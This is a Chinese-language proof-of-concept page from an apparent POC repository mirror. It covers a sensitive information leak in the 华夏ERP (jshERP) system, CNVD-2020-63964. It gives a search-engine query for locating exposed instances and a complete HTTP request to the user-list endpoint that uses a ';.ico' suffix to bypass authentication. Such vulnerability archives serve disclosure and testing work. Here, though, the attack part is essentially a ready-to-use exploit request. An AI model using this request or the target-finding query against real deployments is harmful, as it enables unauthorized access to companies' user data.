admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/华夏ERP/华夏ERP敏感信息泄漏漏洞(CNVD-2020-63964).md

33 lines
1.3 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 华夏ERP敏感信息泄漏漏洞CNVD-2020-63964
# 一、漏洞简介
华夏ERP基于SpringBoot框架、SaaS模式立志为中小企业提供开源好用的ERP软件目前专注进销存+财务功能。 华夏ERP系统存在敏感信息漏洞攻击者可利用该漏洞获取敏感信息。
# 二、影响版本
+ 华夏ERP
# 三、资产测绘
+ hunter`web.body="jshERP-boot"`
+ 登录页面
![1693580405514-b7fa6757-7b89-4293-9e70-534cdf8001b4.png](./img/okq7OrqZU_vpgIqS/1693580405514-b7fa6757-7b89-4293-9e70-534cdf8001b4-288811.png)
# 四、漏洞复现
```java
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1693579975; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1693580257
Upgrade-Insecure-Requests: 1
```
![1693580565498-ff5668d8-7ece-45cf-bcec-abd1d6a81636.png](./img/okq7OrqZU_vpgIqS/1693580565498-ff5668d8-7ece-45cf-bcec-abd1d6a81636-684436.png)
> 更新: 2024-02-29 23:55:50
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wtdceob1qqhc24yg>
Reference in New Issue Copy Permalink